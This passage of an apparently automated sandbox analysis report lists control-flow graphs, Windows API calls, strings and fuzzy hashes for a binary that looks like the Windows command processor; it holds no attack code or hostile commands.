19064->19072 19065->19055 19065->19060 19078 7ff7e1db7348 168 API calls 19065->19078 19066->19058 19073 7ff7e1dd4738 19067->19073 19068->19061 19081 7ff7e1dd46c7 19068->19081 19082 7ff7e1dd46ea 19068->19082 19069->19055 19074 7ff7e1dd45db 19070->19074 19071->19064 19075 7ff7e1dd44f1 19072->19075 19076 7ff7e1db7348 168 API calls 19073->19076 19079 7ff7e1db7348 168 API calls 19074->19079 19080 7ff7e1db72b0 168 API calls 19075->19080 19076->19077 19077->19048 19077->19058 19078->19060 19083 7ff7e1dd45ec 19079->19083 19084 7ff7e1dd4503 19080->19084 19081->19061 19087 7ff7e1db7348 168 API calls 19081->19087 19085 7ff7e1db7348 168 API calls 19082->19085 19086 7ff7e1db7348 168 API calls 19083->19086 19084->19058 19089 7ff7e1db7348 168 API calls 19084->19089 19085->19061 19088 7ff7e1dd4600 19086->19088 19087->19061 19090 7ff7e1db7348 168 API calls 19088->19090 19089->19077 19090->19077 19093 7ff7e1db735d 19091->19093 19092 7ff7e1db3278 166 API calls 19094 7ff7e1dd4820 longjmp 19092->19094 19093->19092 19093->19093 19095 7ff7e1dd4838 19093->19095 19101 7ff7e1db73ab 19093->19101 19094->19095 19096 7ff7e1db3278 166 API calls 19095->19096 19097 7ff7e1dd4844 longjmp 19096->19097 19098 7ff7e1dd485a 19097->19098 19099 7ff7e1db7348 166 API calls 19098->19099 19100 7ff7e1dd487b 19099->19100 19102 7ff7e1db7348 166 API calls 19100->19102 19103 7ff7e1dd48ad 19102->19103 19104 7ff7e1db7348 166 API calls 19103->19104 19105 7ff7e1db72ff 19104->19105 19105->19043 19105->19047 19107 7ff7e1db7401 19106->19107 19108 7ff7e1dd485a 19106->19108 19107->19058 19109 7ff7e1db7348 168 API calls 19108->19109 19110 7ff7e1dd487b 19109->19110 19111 7ff7e1db7348 168 API calls 19110->19111 19112 7ff7e1dd48ad 19111->19112 19113 7ff7e1db7348 168 API calls 19112->19113 19114 7ff7e1dd48be 19113->19114 19114->19058 16742 7ff7e1dc8d80 16743 7ff7e1dc8da4 16742->16743 16744 7ff7e1dc8db6 16743->16744 16745 7ff7e1dc8dbf Sleep 16743->16745 16746 7ff7e1dc8ddb _amsg_exit 16744->16746 16752 7ff7e1dc8de7 16744->16752 
16745->16743 16746->16752 16747 7ff7e1dc8e56 _initterm 16749 7ff7e1dc8e73 _IsNonwritableInCurrentImage 16747->16749 16748 7ff7e1dc8e3c 16756 7ff7e1dc37d8 GetCurrentThreadId OpenThread 16749->16756 16752->16747 16752->16748 16752->16749 16789 7ff7e1dc04f4 16756->16789 16758 7ff7e1dc3839 HeapSetInformation RegOpenKeyExW 16759 7ff7e1dce9f8 RegQueryValueExW RegCloseKey 16758->16759 16760 7ff7e1dc388d 16758->16760 16762 7ff7e1dcea41 GetThreadLocale 16759->16762 16761 7ff7e1dc5920 VirtualQuery VirtualQuery 16760->16761 16763 7ff7e1dc38ab GetConsoleOutputCP GetCPInfo 16761->16763 16776 7ff7e1dc3919 16762->16776 16763->16762 16764 7ff7e1dc38f1 memset 16763->16764 16764->16776 16765 7ff7e1dc4d5c 391 API calls 16765->16776 16766 7ff7e1db3240 166 API calls 16766->16776 16767 7ff7e1dc3948 _setjmp 16767->16776 16768 7ff7e1dceb27 _setjmp 16768->16776 16769 7ff7e1dd8530 370 API calls 16769->16776 16770 7ff7e1dc01b8 6 API calls 16770->16776 16771 7ff7e1dc4c1c 166 API calls 16771->16776 16772 7ff7e1dbdf60 481 API calls 16772->16776 16773 7ff7e1dceb71 _setmode 16773->16776 16774 7ff7e1dc0580 12 API calls 16777 7ff7e1dc398b GetConsoleOutputCP GetCPInfo 16774->16777 16775 7ff7e1dc86f0 182 API calls 16775->16776 16776->16759 16776->16765 16776->16766 16776->16767 16776->16768 16776->16769 16776->16770 16776->16771 16776->16772 16776->16773 16776->16774 16776->16775 16778 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 16776->16778 16780 7ff7e1dbbe00 647 API calls 16776->16780 16781 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 16776->16781 16779 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16777->16779 16778->16776 16779->16776 16780->16776 16782 7ff7e1dcebbe GetConsoleOutputCP GetCPInfo 16781->16782 16783 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16782->16783 16784 7ff7e1dcebe6 16783->16784 16785 7ff7e1dbbe00 647 API calls 16784->16785 16786 7ff7e1dc0580 12 API calls 16784->16786 16785->16784 16787 7ff7e1dcebfc GetConsoleOutputCP 
GetCPInfo 16786->16787 16788 7ff7e1dc04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16787->16788 16788->16776 16790 7ff7e1dc0504 16789->16790 16791 7ff7e1dc051e GetModuleHandleW 16790->16791 16792 7ff7e1dc054d GetProcAddress 16790->16792 16793 7ff7e1dc056c SetThreadLocale 16790->16793 16791->16790 16792->16790
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                      • API String ID: 3305344409-4288247545
                                                      • Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                      • Instruction ID: 792d6073e1623914c260ae244dc1910add6848bb42fc3424631bdf3e8537c91b
                                                      • Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                      • Instruction Fuzzy Hash: C342F665A08A8285EB14EB1198023B9E7A1FF85794FC44A32DD1E877D4DFBCE144C3A2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 216 7ff7e1dbaa54-7ff7e1dbaa98 call 7ff7e1dbcd90 219 7ff7e1dbaa9e 216->219 220 7ff7e1dcbf5a-7ff7e1dcbf70 call 7ff7e1dc4c1c call 7ff7e1dbff70 216->220 221 7ff7e1dbaaa5-7ff7e1dbaaa8 219->221 223 7ff7e1dbacde-7ff7e1dbad00 221->223 224 7ff7e1dbaaae-7ff7e1dbaac8 wcschr 221->224 230 7ff7e1dbad06 223->230 224->223 227 7ff7e1dbaace-7ff7e1dbaae9 towlower 224->227 227->223 229 7ff7e1dbaaef-7ff7e1dbaaf3 227->229 233 7ff7e1dbaaf9-7ff7e1dbaafd 229->233 234 7ff7e1dcbeb7-7ff7e1dcbec4 call 7ff7e1ddeaf0 229->234 231 7ff7e1dbad0d-7ff7e1dbad1f 230->231 237 7ff7e1dbad22-7ff7e1dbad2a call 7ff7e1dc13e0 231->237 235 7ff7e1dcbbcf 233->235 236 7ff7e1dbab03-7ff7e1dbab07 233->236 246 7ff7e1dcbf43-7ff7e1dcbf59 call 7ff7e1dc4c1c 234->246 247 7ff7e1dcbec6-7ff7e1dcbed8 call 7ff7e1db3240 234->247 249 7ff7e1dcbbde 235->249 239 7ff7e1dbab09-7ff7e1dbab0d 236->239 240 7ff7e1dbab7d-7ff7e1dbab81 236->240 237->221 243 7ff7e1dcbe63 239->243 244 7ff7e1dbab13-7ff7e1dbab17 239->244 240->243 248 7ff7e1dbab87-7ff7e1dbab95 240->248 255 7ff7e1dcbe72-7ff7e1dcbe88 call 7ff7e1db3278 call 7ff7e1dc4c1c 243->255 244->240 250 7ff7e1dbab19-7ff7e1dbab1d 244->250 246->220 247->246 263 7ff7e1dcbeda-7ff7e1dcbee9 call 7ff7e1db3240 247->263 253 7ff7e1dbab98-7ff7e1dbaba0 248->253 259 7ff7e1dcbbea-7ff7e1dcbbec 249->259 250->249 254 7ff7e1dbab23-7ff7e1dbab27 250->254 253->253 258 7ff7e1dbaba2-7ff7e1dbabb3 call 7ff7e1dbcd90 253->258 254->259 261 7ff7e1dbab2d-7ff7e1dbab31 254->261 283 7ff7e1dcbe89-7ff7e1dcbe8c 255->283 258->220 269 7ff7e1dbabb9-7ff7e1dbabde call 7ff7e1dc13e0 call 7ff7e1dc33a8 258->269 265 7ff7e1dcbbf8-7ff7e1dcbc01 259->265 261->230 266 7ff7e1dbab37-7ff7e1dbab3b 261->266 277 7ff7e1dcbef3-7ff7e1dcbef9 263->277 278 7ff7e1dcbeeb-7ff7e1dcbef1 263->278 265->231 266->265 270 7ff7e1dbab41-7ff7e1dbab45 266->270 305 7ff7e1dbac75 269->305 306 7ff7e1dbabe4-7ff7e1dbabe7 269->306 274 7ff7e1dcbc06-7ff7e1dcbc2a call 7ff7e1dc13e0 270->274 275 
7ff7e1dbab4b-7ff7e1dbab4f 270->275 294 7ff7e1dcbc2c-7ff7e1dcbc4c _wcsnicmp 274->294 295 7ff7e1dcbc5a-7ff7e1dcbc61 274->295 281 7ff7e1dbad2f-7ff7e1dbad33 275->281 282 7ff7e1dbab55-7ff7e1dbab78 call 7ff7e1dc13e0 275->282 277->246 284 7ff7e1dcbefb-7ff7e1dcbf0d call 7ff7e1db3240 277->284 278->246 278->277 288 7ff7e1dcbc66-7ff7e1dcbc8a call 7ff7e1dc13e0 281->288 289 7ff7e1dbad39-7ff7e1dbad3d 281->289 282->221 291 7ff7e1dcbe92-7ff7e1dcbeaa call 7ff7e1db3278 call 7ff7e1dc4c1c 283->291 292 7ff7e1dbacbe 283->292 284->246 303 7ff7e1dcbf0f-7ff7e1dcbf21 call 7ff7e1db3240 284->303 324 7ff7e1dcbcc4-7ff7e1dcbcdc 288->324 325 7ff7e1dcbc8c-7ff7e1dcbcaa _wcsnicmp 288->325 297 7ff7e1dbad43-7ff7e1dbad49 289->297 298 7ff7e1dcbcde-7ff7e1dcbd02 call 7ff7e1dc13e0 289->298 337 7ff7e1dcbeab-7ff7e1dcbeb6 call 7ff7e1dc4c1c 291->337 301 7ff7e1dbacc0-7ff7e1dbacc7 292->301 294->295 304 7ff7e1dcbc4e-7ff7e1dcbc55 294->304 309 7ff7e1dcbd31-7ff7e1dcbd4f _wcsnicmp 295->309 307 7ff7e1dbad4f-7ff7e1dbad68 297->307 308 7ff7e1dcbd5e-7ff7e1dcbd65 297->308 331 7ff7e1dcbd04-7ff7e1dcbd24 _wcsnicmp 298->331 332 7ff7e1dcbd2a 298->332 301->301 311 7ff7e1dbacc9-7ff7e1dbacda 301->311 303->246 339 7ff7e1dcbf23-7ff7e1dcbf35 call 7ff7e1db3240 303->339 319 7ff7e1dcbbb3-7ff7e1dcbbb7 304->319 316 7ff7e1dbac77-7ff7e1dbac7f 305->316 306->292 321 7ff7e1dbabed-7ff7e1dbac0b call 7ff7e1dbcd90 * 2 306->321 322 7ff7e1dbad6a 307->322 323 7ff7e1dbad6d-7ff7e1dbad70 307->323 308->307 320 7ff7e1dcbd6b-7ff7e1dcbd73 308->320 317 7ff7e1dcbd55 309->317 318 7ff7e1dcbbc2-7ff7e1dcbbca 309->318 311->223 316->292 328 7ff7e1dbac81-7ff7e1dbac85 316->328 317->308 318->221 333 7ff7e1dcbbba-7ff7e1dcbbbd call 7ff7e1dc13e0 319->333 334 7ff7e1dcbd79-7ff7e1dcbd8b iswxdigit 320->334 335 7ff7e1dcbe4a-7ff7e1dcbe5e 320->335 321->337 358 7ff7e1dbac11-7ff7e1dbac14 321->358 322->323 323->237 324->309 325->324 329 7ff7e1dcbcac-7ff7e1dcbcbf 325->329 340 7ff7e1dbac88-7ff7e1dbac8f 328->340 329->319 331->332 338 7ff7e1dcbbac 331->338 332->309 333->318 334->335 
342 7ff7e1dcbd91-7ff7e1dcbda3 iswxdigit 334->342 335->333 337->234 338->319 339->246 354 7ff7e1dcbf37-7ff7e1dcbf3e call 7ff7e1db3240 339->354 340->340 345 7ff7e1dbac91-7ff7e1dbac94 340->345 342->335 347 7ff7e1dcbda9-7ff7e1dcbdbb iswxdigit 342->347 345->292 351 7ff7e1dbac96-7ff7e1dbacaa wcsrchr 345->351 347->335 352 7ff7e1dcbdc1-7ff7e1dcbdd7 iswdigit 347->352 351->292 355 7ff7e1dbacac-7ff7e1dbacb9 call 7ff7e1dc1300 351->355 356 7ff7e1dcbddf-7ff7e1dcbdeb towlower 352->356 357 7ff7e1dcbdd9-7ff7e1dcbddd 352->357 354->246 355->292 361 7ff7e1dcbdee-7ff7e1dcbe0f iswdigit 356->361 357->361 358->337 362 7ff7e1dbac1a-7ff7e1dbac33 memset 358->362 363 7ff7e1dcbe11-7ff7e1dcbe15 361->363 364 7ff7e1dcbe17-7ff7e1dcbe23 towlower 361->364 362->305 365 7ff7e1dbac35-7ff7e1dbac4b wcschr 362->365 366 7ff7e1dcbe26-7ff7e1dcbe45 call 7ff7e1dc13e0 363->366 364->366 365->305 367 7ff7e1dbac4d-7ff7e1dbac54 365->367 366->335 368 7ff7e1dbad72-7ff7e1dbad91 wcschr 367->368 369 7ff7e1dbac5a-7ff7e1dbac6f wcschr 367->369 371 7ff7e1dbaf03-7ff7e1dbaf07 368->371 372 7ff7e1dbad97-7ff7e1dbadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff7e1dbadb2-7ff7e1dbadc7 wcschr 372->373 373->371 374 7ff7e1dbadcd-7ff7e1dbade2 wcschr 373->374 374->371 375 7ff7e1dbade8-7ff7e1dbadfd wcschr 374->375 375->371 376 7ff7e1dbae03-7ff7e1dbae18 wcschr 375->376 376->371 377 7ff7e1dbae1e-7ff7e1dbae21 376->377 378 7ff7e1dbae24-7ff7e1dbae27 377->378 378->371 379 7ff7e1dbae2d-7ff7e1dbae40 iswspace 378->379 380 7ff7e1dbae42-7ff7e1dbae49 379->380 381 7ff7e1dbae4b-7ff7e1dbae5e 379->381 380->378 382 7ff7e1dbae66-7ff7e1dbae6d 381->382 382->382 383 7ff7e1dbae6f-7ff7e1dbae77 382->383 383->255 384 7ff7e1dbae7d-7ff7e1dbae97 call 7ff7e1dc13e0 383->384 387 7ff7e1dbae9a-7ff7e1dbaea4 384->387 388 7ff7e1dbaea6-7ff7e1dbaead 387->388 389 7ff7e1dbaebc-7ff7e1dbaef8 call 7ff7e1dc0a6c call 7ff7e1dbff70 * 2 387->389 388->389 390 7ff7e1dbaeaf-7ff7e1dbaeba 388->390 389->316 397 7ff7e1dbaefe 389->397 390->387 390->389 397->283
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                      • String ID: :$:$:$:ON$OFF
                                                      • API String ID: 972821348-467788257
                                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                      • Instruction ID: f7e4fc3e9d10e990a3eb59c9c5e60b5983400714d21d22fa8d52f268e6204d51
                                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                      • Instruction Fuzzy Hash: 22229F21E0864296EB28FF2595163B9E691FF49B81FC88437C90E47394DFBCE444C7A2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 398 7ff7e1dc51ec-7ff7e1dc5248 call 7ff7e1dc5508 GetLocaleInfoW 401 7ff7e1dcef32-7ff7e1dcef3c 398->401 402 7ff7e1dc524e-7ff7e1dc5272 GetLocaleInfoW 398->402 405 7ff7e1dcef3f-7ff7e1dcef49 401->405 403 7ff7e1dc5295-7ff7e1dc52b9 GetLocaleInfoW 402->403 404 7ff7e1dc5274-7ff7e1dc527a 402->404 408 7ff7e1dc52de-7ff7e1dc5305 GetLocaleInfoW 403->408 409 7ff7e1dc52bb-7ff7e1dc52c3 403->409 406 7ff7e1dc5280-7ff7e1dc5286 404->406 407 7ff7e1dc54f7-7ff7e1dc54f9 404->407 410 7ff7e1dcef61-7ff7e1dcef6c 405->410 411 7ff7e1dcef4b-7ff7e1dcef52 405->411 406->407 412 7ff7e1dc528c-7ff7e1dc528f 406->412 407->401 415 7ff7e1dc5321-7ff7e1dc5343 GetLocaleInfoW 408->415 416 7ff7e1dc5307-7ff7e1dc531b 408->416 413 7ff7e1dcef75-7ff7e1dcef78 409->413 414 7ff7e1dc52c9-7ff7e1dc52d7 409->414 410->413 411->410 417 7ff7e1dcef54-7ff7e1dcef5f 411->417 412->403 418 7ff7e1dcef99-7ff7e1dcefa3 413->418 419 7ff7e1dcef7a-7ff7e1dcef7d 413->419 414->408 420 7ff7e1dcefaf-7ff7e1dcefb9 415->420 421 7ff7e1dc5349-7ff7e1dc536e GetLocaleInfoW 415->421 416->415 417->405 417->410 418->420 419->408 422 7ff7e1dcef83-7ff7e1dcef8d 419->422 423 7ff7e1dcefbc-7ff7e1dcefc6 420->423 424 7ff7e1dc5374-7ff7e1dc5396 GetLocaleInfoW 421->424 425 7ff7e1dceff2-7ff7e1dceffc 421->425 422->418 426 7ff7e1dcefde-7ff7e1dcefe9 423->426 427 7ff7e1dcefc8-7ff7e1dcefcf 423->427 429 7ff7e1dcf035-7ff7e1dcf03f 424->429 430 7ff7e1dc539c-7ff7e1dc53be GetLocaleInfoW 424->430 428 7ff7e1dcefff-7ff7e1dcf009 425->428 426->425 427->426 432 7ff7e1dcefd1-7ff7e1dcefdc 427->432 433 7ff7e1dcf021-7ff7e1dcf02c 428->433 434 7ff7e1dcf00b-7ff7e1dcf012 428->434 431 7ff7e1dcf042-7ff7e1dcf04c 429->431 435 7ff7e1dc53c4-7ff7e1dc53e6 GetLocaleInfoW 430->435 436 7ff7e1dcf078-7ff7e1dcf082 430->436 439 7ff7e1dcf064-7ff7e1dcf06f 431->439 440 7ff7e1dcf04e-7ff7e1dcf055 431->440 432->423 432->426 433->429 434->433 442 7ff7e1dcf014-7ff7e1dcf01f 434->442 437 7ff7e1dcf0bb-7ff7e1dcf0c5 435->437 438 7ff7e1dc53ec-7ff7e1dc540e GetLocaleInfoW 435->438 441 7ff7e1dcf085-7ff7e1dcf08f 436->441 448 7ff7e1dcf0c8-7ff7e1dcf0d2 437->448 443 7ff7e1dc5414-7ff7e1dc5436 GetLocaleInfoW 438->443 444 7ff7e1dcf0fe-7ff7e1dcf108 438->444 439->436 440->439 445 7ff7e1dcf057-7ff7e1dcf062 440->445 446 7ff7e1dcf091-7ff7e1dcf098 441->446 447 7ff7e1dcf0a7-7ff7e1dcf0b2 441->447 442->428 442->433 451 7ff7e1dcf141-7ff7e1dcf14b 443->451 452 7ff7e1dc543c-7ff7e1dc545e GetLocaleInfoW 443->452 453 7ff7e1dcf10b-7ff7e1dcf115 444->453 445->431 445->439 446->447 454 7ff7e1dcf09a-7ff7e1dcf0a5 446->454 447->437 449 7ff7e1dcf0d4-7ff7e1dcf0db 448->449 450 7ff7e1dcf0ea-7ff7e1dcf0f5 448->450 449->450 455 7ff7e1dcf0dd-7ff7e1dcf0e8 449->455 450->444 460 7ff7e1dcf14e-7ff7e1dcf158 451->460 456 7ff7e1dcf184-7ff7e1dcf18b 452->456 457 7ff7e1dc5464-7ff7e1dc5486 GetLocaleInfoW 452->457 458 7ff7e1dcf12d-7ff7e1dcf138 453->458 459 7ff7e1dcf117-7ff7e1dcf11e 453->459 454->441 454->447 455->448 455->450 461 7ff7e1dcf18e-7ff7e1dcf198 456->461 462 7ff7e1dcf1c4-7ff7e1dcf1ce 457->462 463 7ff7e1dc548c-7ff7e1dc54ae GetLocaleInfoW 457->463 458->451 459->458 464 7ff7e1dcf120-7ff7e1dcf12b 459->464 465 7ff7e1dcf170-7ff7e1dcf17b 460->465 466 7ff7e1dcf15a-7ff7e1dcf161 460->466 467 7ff7e1dcf1b0-7ff7e1dcf1bb 461->467 468 7ff7e1dcf19a-7ff7e1dcf1a1 461->468 471 7ff7e1dcf1d1-7ff7e1dcf1db 462->471 469 7ff7e1dc54b4-7ff7e1dc54f5 setlocale call 7ff7e1dc8f80 463->469 470 7ff7e1dcf207-7ff7e1dcf20e 463->470 464->453 464->458 465->456 466->465 472 7ff7e1dcf163-7ff7e1dcf16e 466->472 467->462 468->467 473 7ff7e1dcf1a3-7ff7e1dcf1ae 468->473 477 7ff7e1dcf211-7ff7e1dcf21b 470->477 475 7ff7e1dcf1f3-7ff7e1dcf1fe 471->475 476 7ff7e1dcf1dd-7ff7e1dcf1e4 471->476 472->460 472->465 473->461 473->467 475->470 476->475 479 7ff7e1dcf1e6-7ff7e1dcf1f1 476->479 480 7ff7e1dcf233-7ff7e1dcf23e 477->480 481 7ff7e1dcf21d-7ff7e1dcf224 477->481 479->471 479->475 481->480 482 7ff7e1dcf226-7ff7e1dcf231 481->482 482->477 482->480
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                      • API String ID: 1351325837-2236139042
                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                      • Instruction ID: 13585ba12c7c99d986d99022a582b6112966797bb33f082acd547125e474cb64
                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                      • Instruction Fuzzy Hash: BEF17966B0874285EF25EF11D9023B9A6A5FF49B81FC48537CA0D47294EFBCE505C3A2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 483 7ff7e1dc4224-7ff7e1dc42a5 InitializeProcThreadAttributeList 484 7ff7e1dcecd4-7ff7e1dcecee GetLastError call 7ff7e1dd9eec 483->484 485 7ff7e1dc42ab-7ff7e1dc42e5 UpdateProcThreadAttribute 483->485 492 7ff7e1dced1e 484->492 487 7ff7e1dcecf0-7ff7e1dced19 GetLastError call 7ff7e1dd9eec DeleteProcThreadAttributeList 485->487 488 7ff7e1dc42eb-7ff7e1dc43c6 memset * 2 GetStartupInfoW call 7ff7e1dc3a90 call 7ff7e1dbb900 485->488 487->492 497 7ff7e1dc4638-7ff7e1dc4644 _local_unwind 488->497 498 7ff7e1dc43cc-7ff7e1dc43d3 488->498 499 7ff7e1dc4649-7ff7e1dc4650 497->499 498->499 500 7ff7e1dc43d9-7ff7e1dc43dc 498->500 499->500 503 7ff7e1dc4656-7ff7e1dc465d 499->503 501 7ff7e1dc4415-7ff7e1dc4424 call 7ff7e1dc5a68 500->501 502 7ff7e1dc43de-7ff7e1dc43f5 wcsrchr 500->502 510 7ff7e1dc442a-7ff7e1dc4486 CreateProcessW 501->510 511 7ff7e1dc4589-7ff7e1dc4590 501->511 502->501 504 7ff7e1dc43f7-7ff7e1dc440f lstrcmpW 502->504 503->501 506 7ff7e1dc4663 503->506 504->501 507 7ff7e1dc4668-7ff7e1dc466d call 7ff7e1dd9044 504->507 506->500 507->501 513 7ff7e1dc448b-7ff7e1dc448f 510->513 511->510 514 7ff7e1dc4596-7ff7e1dc45fa CreateProcessAsUserW 511->514 515 7ff7e1dc4672-7ff7e1dc4682 GetLastError 513->515 516 7ff7e1dc4495-7ff7e1dc44c7 CloseHandle call 7ff7e1dc498c 513->516 514->513 518 7ff7e1dc468d-7ff7e1dc4694 515->518 516->518 522 7ff7e1dc44cd-7ff7e1dc44e5 516->522 520 7ff7e1dc46a2-7ff7e1dc46ac 518->520 521 7ff7e1dc4696-7ff7e1dc46a0 518->521 523 7ff7e1dc4705-7ff7e1dc4707 520->523 524 7ff7e1dc46ae-7ff7e1dc46b5 call 7ff7e1dc97bc 520->524 521->520 521->524 525 7ff7e1dc47a3-7ff7e1dc47a9 522->525 526 7ff7e1dc44eb-7ff7e1dc44f2 522->526 523->522 530 7ff7e1dc470d-7ff7e1dc472a call 7ff7e1dbcd90 523->530 540 7ff7e1dc4703 524->540 541 7ff7e1dc46b7-7ff7e1dc4701 call 7ff7e1e0c038 524->541 527 7ff7e1dc45ff-7ff7e1dc4607 526->527 528 7ff7e1dc44f8-7ff7e1dc4507 526->528 527->528 531 7ff7e1dc460d 527->531 532 7ff7e1dc4612-7ff7e1dc4616 528->532 533 7ff7e1dc450d-7ff7e1dc4553 call 7ff7e1dc5cb4 call 7ff7e1dc33f0 call 7ff7e1dc498c 528->533 548 7ff7e1dc473d-7ff7e1dc4767 call 7ff7e1dc13e0 call 7ff7e1dd9eec call 7ff7e1dbff70 _local_unwind 530->548 549 7ff7e1dc472c-7ff7e1dc4738 _local_unwind 530->549 536 7ff7e1dc476c-7ff7e1dc4773 531->536 538 7ff7e1dc47d7-7ff7e1dc47df 532->538 539 7ff7e1dc461c-7ff7e1dc4633 532->539 565 7ff7e1dc4558-7ff7e1dc455e 533->565 536->528 546 7ff7e1dc4779-7ff7e1dc4780 536->546 543 7ff7e1dc47f2-7ff7e1dc483c call 7ff7e1dbff70 DeleteProcThreadAttributeList call 7ff7e1dc8f80 538->543 544 7ff7e1dc47e1-7ff7e1dc47ed CloseHandle 538->544 539->543 540->523 541->523 544->543 546->528 552 7ff7e1dc4786-7ff7e1dc4789 546->552 548->536 549->548 552->528 557 7ff7e1dc478f-7ff7e1dc4792 552->557 557->525 561 7ff7e1dc4794-7ff7e1dc479d call 7ff7e1dda250 557->561 561->525 561->528 568 7ff7e1dc4564-7ff7e1dc4579 call 7ff7e1dc498c 565->568 569 7ff7e1dc47ae-7ff7e1dc47ca call 7ff7e1dc33f0 565->569 568->543 576 7ff7e1dc457f-7ff7e1dc4584 call 7ff7e1dda920 568->576 569->538 576->543
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                      • API String ID: 388421343-2905461000
